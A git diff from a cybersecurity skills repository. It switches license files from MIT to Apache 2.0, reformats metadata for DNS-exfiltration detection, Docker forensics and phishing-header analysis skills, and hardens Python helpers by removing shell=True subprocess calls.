   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -1,16 +1,38 @@
 ---
 name: analyzing-dns-logs-for-exfiltration
-description: >
+description: 'Analyzes DNS query logs to detect data exfiltration via DNS tunneling,
-  Analyzes DNS query logs to detect data exfiltration via DNS tunneling, DGA domain communication,
+  DGA domain communication, and covert C2 channels using entropy analysis, query volume
-  and covert C2 channels using entropy analysis, query volume anomalies, and subdomain length
+  anomalies, and subdomain length detection in SIEM platforms. Use when SOC teams
-  detection in SIEM platforms. Use when SOC teams need to identify DNS-based threats that bypass
+  need to identify DNS-based threats that bypass traditional network security controls.
-  traditional network security controls.
+
  '
 domain: cybersecurity
 subdomain: soc-operations
-tags: [soc, dns, exfiltration, dns-tunneling, dga, c2-detection, splunk, threat-detection]
+tags:
-version: "1.0"
+- soc
 - dns
 - exfiltration
 - dns-tunneling
 - dga
 - c2-detection
 - splunk
 - threat-detection
 version: '1.0'
 author: mahipal
-license: MIT
+license: Apache-2.0
 atlas_techniques:
 - AML.T0024
 - AML.T0056
 - AML.T0086
 nist_csf:
 - DE.CM-01
 - DE.AE-02
 - RS.MA-01
 - DE.AE-06
 mitre_attack:
 - T1048.003
 - T1071.004
 - T1567
 ---
 # Analyzing DNS Logs for Exfiltration
@@ -2,11 +2,6 @@
 """DNS exfiltration detection agent using entropy analysis and query pattern detection."""
 import math
 import os
 import sys
 import json
 import csv
 import datetime
 from collections import Counter, defaultdict
@@ -1,21 +1,201 @@
 MIT License
-Copyright (c) 2025 Mahipal
+                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
-Permission is hereby granted, free of charge, to any person obtaining a copy
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all
+   1. Definitions.
 copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+      "License" shall mean the terms and conditions for use, reproduction,
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+      and distribution as defined by Sections 1 through 9 of this document.
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+      "Licensor" shall mean the copyright owner or entity authorized by
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+      the copyright owner that is granting the License.
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+
-SOFTWARE.
+      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -1,12 +1,29 @@
 ---
 name: analyzing-docker-container-forensics
-description: Investigate compromised Docker containers by analyzing images, layers, volumes, logs, and runtime artifacts to identify malicious activity and evidence.
+description: Investigate compromised Docker containers by analyzing images, layers,
  volumes, logs, and runtime artifacts to identify malicious activity and evidence.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [forensics, docker, container-forensics, container-security, image-analysis, runtime-investigation]
+tags:
-version: "1.0"
+- forensics
 - docker
 - container-forensics
 - container-security
 - image-analysis
 - runtime-investigation
 version: '1.0'
 author: mahipal
-license: MIT
+license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1610
 - T1611
 - T1613
 - T1612
 ---
 # Analyzing Docker Container Forensics
@@ -1,6 +1,7 @@
 #!/usr/bin/env python3
 """Docker container forensics agent for investigating compromised containers."""
 import shlex
 import subprocess
 import json
 import os
@@ -10,8 +11,10 @@ import datetime
 def run_cmd(cmd):
-    """Execute a shell command and return output."""
+    """Execute a command and return output."""
-    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
+    if isinstance(cmd, str):
        cmd = shlex.split(cmd)
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
    return result.stdout.strip(), result.stderr.strip(), result.returncode
@@ -134,9 +137,13 @@ def detect_suspicious_files(changes):
 def export_container(container_id, output_path):
    """Export container filesystem as a tarball for offline analysis."""
-    cmd = f"docker export {container_id} > {output_path}"
+    with open(output_path, "wb") as out_f:
-    _, _, rc = run_cmd(cmd)
+        result = subprocess.run(
-    if rc == 0 and os.path.exists(output_path):
+            ["docker", "export", container_id],
            stdout=out_f, stderr=subprocess.PIPE,
            timeout=120,
        )
    if result.returncode == 0 and os.path.exists(output_path):
        sha256 = hashlib.sha256()
        with open(output_path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
@@ -1,21 +1,201 @@
 MIT License
-Copyright (c) 2025 Mahipal
+                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
-Permission is hereby granted, free of charge, to any person obtaining a copy
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all
+   1. Definitions.
 copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+      "License" shall mean the terms and conditions for use, reproduction,
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+      and distribution as defined by Sections 1 through 9 of this document.
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+      "Licensor" shall mean the copyright owner or entity authorized by
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+      the copyright owner that is granting the License.
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+
-SOFTWARE.
+      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -1,12 +1,63 @@
 ---
 name: analyzing-email-headers-for-phishing-investigation
-description: Parse and analyze email headers to trace the origin of phishing emails, verify sender authenticity, and identify spoofing through SPF, DKIM, and DMARC validation.
+description: Parse and analyze email headers to trace the origin of phishing emails,
  verify sender authenticity, and identify spoofing through SPF, DKIM, and DMARC validation.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [forensics, email-analysis, phishing, spf, dkim, dmarc, header-analysis]
+tags:
-version: "1.0"
+- forensics
 - email-analysis
 - phishing
 - spf
 - dkim
 - dmarc
 - header-analysis
 version: '1.0'
 author: mahipal
-license: MIT
+license: Apache-2.0
 atlas_techniques:
 - AML.T0052
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1566.001
 - T1566.002
 - T1598.003
 mitre_f3:
  version: '1.1'
  tactics:
  - reconnaissance
  - initial-access
  - stealth
  - resource-development
  techniques:
  - id: T1598
    name: Phishing for Information
    tactic: reconnaissance
    source: attack
  - id: T1660
    name: Phishing
    tactic: initial-access
    source: attack
  - id: T1672
    name: Email Spoofing
    tactic: stealth
    source: attack
  - id: F1032
    name: Impersonate Official
    tactic: initial-access
    source: f3
  - id: T1583.001
    name: 'Acquire Infrastructure: Domains'
    tactic: resource-development
    source: attack
  - id: F1020.002
    name: 'Create Fake Materials: Fake Website'
    tactic: resource-development
    source: f3
 ---
 # Analyzing Email Headers for Phishing Investigation
@@ -8,7 +8,6 @@ import hashlib
 import os
 import sys
 import subprocess
 import json
 from email import policy
@@ -147,9 +146,10 @@ def extract_attachments(msg, output_dir=None):
 def dns_lookup(domain, record_type="TXT"):
    """Perform DNS lookup for SPF/DKIM/DMARC records."""
-    cmd = f"dig {record_type} {domain} +short"
+    stdout, _, rc = subprocess.run(
-    stdout, _, rc = subprocess.run(cmd, shell=True, capture_output=True, text=True,
+        ["dig", record_type, domain, "+short"],
-                                    timeout=10).stdout, "", 0
+        capture_output=True, text=True, timeout=10
    ).stdout, "", 0
    return stdout.strip() if stdout else ""
@@ -0,0 +1,201 @@
                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
   1. Definitions.
      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.
      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.
      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
